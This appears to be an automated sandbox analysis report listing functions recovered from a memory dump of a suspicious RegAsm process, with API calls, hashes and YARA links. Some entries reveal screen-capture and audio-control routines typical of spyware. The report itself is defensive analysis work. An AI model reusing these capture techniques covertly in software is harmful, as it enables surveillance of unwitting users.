                                                                                              Function 00444524 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444578
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                              • String ID:
                                                                                              • API String ID: 1663032902-0
                                                                                              • Opcode ID: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
                                                                                              • Instruction ID: b26485aea30f030f9f54250f3ad1374887b22aef8311f1835d05ff9e541aa45f
                                                                                              • Opcode Fuzzy Hash: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
                                                                                              • Instruction Fuzzy Hash: CA217172900206BBEF249F25DC82BBB73A8EF85314F10417BEA01D6241EB799D55CB59
                                                                                              Function 004441AC Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(004442D4,00000001,00000000,?,0043A13A,?,00444901,00000000,?,?,?), ref: 0044421E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              • Opcode ID: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
                                                                                              • Instruction ID: e40f59eb0fa5de4c9f3a16e8b0591c3d531b47424b4bb394e983a0f53163e8a9
                                                                                              • Opcode Fuzzy Hash: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
                                                                                              • Instruction Fuzzy Hash: 1111253A2007059FEB189F79C8966BAB7A1FFC0399B14442EE98687B40D375B942CB44
                                                                                              Function 00444754 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004444F2,00000000,00000000,?), ref: 00444780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 2692324296-0
                                                                                              • Opcode ID: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
                                                                                              • Instruction ID: 3707f94c9474d79ec8c8af264f29abd72a84bbcb21354a1b498b6705759ad170
                                                                                              • Opcode Fuzzy Hash: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
                                                                                              • Instruction Fuzzy Hash: 81F0F9369001157BFB245A658846BBB7798EB81768F15056AEC05A3240EB78BE42C6D4
                                                                                              Function 00444247 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(00444524,00000001,?,?,0043A13A,?,004448C5,0043A13A,?,?,?,?,?,0043A13A,?,?), ref: 00444293
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              • Opcode ID: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
                                                                                              • Instruction ID: ed68b6acb7b79b841aa03ef9907d8241165ad6fda512d4fef2396eaa6fb624ec
                                                                                              • Opcode Fuzzy Hash: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
                                                                                              • Instruction Fuzzy Hash: 3FF022362003041FEB249F399882B7B7B94FFC03A8F05446EF9019B680D6B5AC01CA44
                                                                                              Function 0043CEC5 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043AD2A: EnterCriticalSection.KERNEL32(-00465500,?,004386A9,00000000,004619A0,0000000C,00438664,00000000,?,?,0043AFC8,00000000,?,0043C6C9,00000001,00000364), ref: 0043AD39
                                                                                              • EnumSystemLocalesW.KERNEL32(0043CE7F,00000001,00461B48,0000000C), ref: 0043CEFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              • Opcode ID: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
                                                                                              • Instruction ID: eba351e3cc4fa079fe98c46d05503de7d11671559dc86b79a4a0c9269dfae67b
                                                                                              • Opcode Fuzzy Hash: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
                                                                                              • Instruction Fuzzy Hash: 84F09C71A60204EFDB10EF69D886B4D77F1EB48715F10502AF510DB1E1D7B949409F9E
                                                                                              Function 00444161 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(004440B8,00000001,?,?,?,00444923,0043A13A,?,?,?,?,?,0043A13A,?,?,?), ref: 00444198
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              • Opcode ID: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
                                                                                              • Instruction ID: 3940252ce8a352bd8bebd02a5c5d0b3aa0470f6d38ba7cac213a61fdd0367e1a
                                                                                              • Opcode Fuzzy Hash: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
                                                                                              • Instruction Fuzzy Hash: D2F0553A30020557DB049F35C849B6A7F90EFC2710F47005EEA058B290C23AA882C798
                                                                                              Function 0042C6C4 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002C6D0,0042C1C4), ref: 0042C6C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
                                                                                              • Instruction ID: e9757334f95d2b5005854ca62c29f3dcca458c893af1fbba705ce56ddbb622d7
                                                                                              • Opcode Fuzzy Hash: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 0043680C Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                                                                              • Instruction ID: 30eacb981cb6278b9ede921612644d04ced7297ace774c55fa6f37c82e0ba73a
                                                                                              • Opcode Fuzzy Hash: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                                                                              • Instruction Fuzzy Hash: 8B5176A060164777EF3CA92884567BF67999F0E304F1AF80FD9C2D7382C62C9D06861E
                                                                                              Function 00436A3B Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                                                                              • Instruction ID: 621a70b502a6b5c6d37222a8ff5bbc931b0a3dc879fdfe3d88000f589cd0ccb1
                                                                                              • Opcode Fuzzy Hash: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                                                                              • Instruction Fuzzy Hash: D551576060060B76DB34696884557BF67D89B0F344F1AF41FD882EB382C50DFD06975E
                                                                                              Function 0041FB71 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                                                                              • Instruction ID: a32e6f4fee792168acabc3a99eaa4178362968a550f51f58417a862e767cbfd4
                                                                                              • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                                                                              • Instruction Fuzzy Hash: B541D276D1061D9BCB04CFA9C5816DEFBF1FF88310F25816AE905B3350D379AA828B84
                                                                                              Function 0044B4B0 Relevance: .7, Instructions: 651COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                                                                              • Instruction ID: 728b4bcd2b28723637816e06e4881ec1bd9ce59320bf7fec46daf2244288b495
                                                                                              • Opcode Fuzzy Hash: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                                                                              • Instruction Fuzzy Hash: 6D322321D69F454DE7239638C862336A248EFB33C5F54C737E81AB5AA6EF29C4C34149
                                                                                              Function 00445C59 Relevance: .6, Instructions: 637COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                                                                              • Instruction ID: 6584078b23f89aed32d62d9620e82e9003f0c038ea44ebf7209e3ce05309007b
                                                                                              • Opcode Fuzzy Hash: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                                                                              • Instruction Fuzzy Hash: 09321921D29F414DE7239634D825336A648AFB73C9F16D737F819B5EAAEB28C4C34109
                                                                                              Function 0041F4D3 Relevance: .4, Instructions: 411COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                                                                              • Instruction ID: 178965d57fe9952de82b7b97e0f16105608be4409eb057888a0a3f3c60355087
                                                                                              • Opcode Fuzzy Hash: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                                                                              • Instruction Fuzzy Hash: 79026D716006518FC318CF2EE89057AB7F1FB8D302745863AE495CB796DB34E926CB98
                                                                                              Function 0043120A Relevance: .3, Instructions: 345COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction ID: 191d1750cc2476baf38904309f755c3ad6ad9953389e3caa19d10b1414658eb7
                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction Fuzzy Hash: 7CC197322050930ADF2D8679887413FFAE15EA67B171A276FD8B3CB2D4EF28D524D524
                                                                                              Function 0041EFDC Relevance: .3, Instructions: 342COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b1f959d54ae18500ce9e7136891542e4a21fb1d39be47b7c1d504fa72425430b
                                                                                              • Instruction ID: 0abdb9aafc57bb68438a50acd3f2ecbd6e1049ece67ae85b0bc1d56911e8b7ce
                                                                                              • Opcode Fuzzy Hash: b1f959d54ae18500ce9e7136891542e4a21fb1d39be47b7c1d504fa72425430b
                                                                                              • Instruction Fuzzy Hash: 51E16274A102688FCB08CF5DE8A18BE73F1FB49302745456EE582D7392CB35EA16DB94
                                                                                              Function 0043163F Relevance: .3, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction ID: ee6c2d19268771462c9197f7b73242e64c44eb7a896abee3da5328890589ff8c
                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction Fuzzy Hash: 55C1D5322061930ADF2D867AC83413FBAE15E967B171A276FD4B3CB2D4EF18D524D624
                                                                                              Function 00430DD5 Relevance: .3, Instructions: 331COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                              • Instruction ID: 4c33483144a6206e2481d487649dabb1675ca56e8a31ab94a4777204e3e8f2ea
                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                              • Instruction Fuzzy Hash: 29C1E73220609309DF2D8679C83013FFAE15AA67B171A2B6FD4B3CB2D4EF18D564D624
                                                                                              Function 004309BD Relevance: .3, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction ID: a9be9406364418b117dfccb16ba3cbf4ac398d75b9daafeab1f7aac4f9d83a5b
                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction Fuzzy Hash: 28C1B53220619309DF2D8679C83413FFAE15AA57B171A275FD4B3CB2C4EF28E564D624
                                                                                              Function 0041606A Relevance: .3, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88fa2ac1d6c747d61fe04868a4c39498acd84e59d39d34293ce00cc94a508a9c
                                                                                              • Instruction ID: ba4722610437f29e61b715c0b74fc57c743cb2af62776873812a0077e47186ab
                                                                                              • Opcode Fuzzy Hash: 88fa2ac1d6c747d61fe04868a4c39498acd84e59d39d34293ce00cc94a508a9c
                                                                                              • Instruction Fuzzy Hash: 99B1B4391146929ACB05EF24C0913F27BA1FF6A304F1850B9DC9CCFB56E3399516EB64
                                                                                              Function 0041FCB4 Relevance: .2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
                                                                                              • Instruction ID: 73028a218e6efc437b141c97914250212e1ee116e92d67fc33dd4042d6646766
                                                                                              • Opcode Fuzzy Hash: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
                                                                                              • Instruction Fuzzy Hash: 2E613B35E0060E9BDF08DFB9D4815EFB7B6FF8C310B10852AE816BB250D7746A498B94
                                                                                              Function 0042E240 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: a6e552f00ab565f691ebadb1e40a45b636efe887c5fa14ffde51f1c265891404
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 74113677300071C396448A2FF4B82B7A78DEAC63207BC43F7D1438B758D12AE401952C
                                                                                              Function 00411D39 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 330windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00411D54
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00411D60
                                                                                                • Part of subcall function 004121BD: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004121F1
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DCB
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411DE3
                                                                                              • DeleteDC.GDI32(00000000), ref: 00411DE6
                                                                                              • DeleteObject.GDI32(?), ref: 00411DEA
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00411E07
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411E1A
                                                                                              • DeleteDC.GDI32(00000000), ref: 00411E1D
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,004595D0,00000000,00000000,?,?,00CC0020), ref: 00411E41
                                                                                              • GetIconInfo.USER32(?,?), ref: 00411E70
                                                                                              • DeleteObject.GDI32(?), ref: 00411E95
                                                                                              • DeleteObject.GDI32(?), ref: 00411E9E
                                                                                              • DrawIcon.USER32(?,00000000,00000000,?), ref: 00411EAD
                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00411ED8
                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00411EFB
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000), ref: 00411F61
                                                                                              • GlobalAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 00411FCA
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00411FEA
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411FFD
                                                                                              • DeleteDC.GDI32(00000000), ref: 00412000
                                                                                              • DeleteObject.GDI32(00000000), ref: 00412005
                                                                                              • GlobalFree.KERNEL32(?), ref: 0041200F
                                                                                              • DeleteObject.GDI32(00000000), ref: 004120B4
                                                                                              • GlobalFree.KERNEL32(?), ref: 004120BB
                                                                                              • DeleteDC.GDI32(004595D0), ref: 004120CA
                                                                                              • DeleteDC.GDI32(00000000), ref: 004120D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                              • String ID: DISPLAY
                                                                                              • API String ID: 479521175-865373369
                                                                                              • Opcode ID: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                                                                              • Instruction ID: a12fe5a06dbbbc465c5be36cf98e5f4f0fe68db3817599c41a0b734274edf732
                                                                                              • Opcode Fuzzy Hash: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                                                                              • Instruction Fuzzy Hash: B6C16C75E00219AFDB14DFA4DC45BEEBBB9FF09304F00406AEA05E72A0DB74A945CB59
                                                                                              Function 0041370E Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004137E5
                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004137F9
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00459594), ref: 0041381E
                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00467C58,00000000), ref: 00413834
                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00413875
                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041388D
                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004138A1
                                                                                              • SetEvent.KERNEL32 ref: 004138C2
                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 004138D3
